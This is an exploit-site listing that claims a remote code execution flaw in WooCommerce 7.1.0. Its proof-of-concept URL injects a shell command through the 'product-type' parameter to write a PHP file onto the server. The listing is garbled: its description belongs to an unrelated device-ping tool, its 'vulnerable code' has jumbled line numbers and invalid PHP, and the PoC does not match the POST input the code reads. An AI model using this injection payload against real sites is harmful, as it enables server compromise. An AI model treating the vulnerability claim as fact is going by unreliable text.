Exploit for WordPress WooCommerce 7.1.0 Remote Code Execution

Name: Exploit for WordPress WooCommerce 7.1.0 Remote Code Execution
Rating: 5 (422 reviews)

2023-03-31 | CVSS 6.8

## https://sploitus.com/exploit?id=PACKETSTORM:171609
# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)  
# Date: 2022-12-07  
# Author: Milad Karimi  
# Vendor Homepage: https://wordpress.org/plugins/woocommerce  
# Software Link: https://wordpress.org/plugins/woocommerce  
# Tested on: windows 10 , firefox  
# Version: 7.1.0  
# CVE : N/A  
  
# Description:  
simple, easy to use jQuery frontend to php backend that pings various  
devices and changes colors from green to red depending on if device is  
up or down.  
  
# PoC :  
  
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php  
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php  
  
  
# Vulnerabile code:  
  
95: $classname $classname($post_id);   
94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');   
92: ⇓ function save($post_id, $post)  
93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));   
92: ⇓ function save($post_id, $post)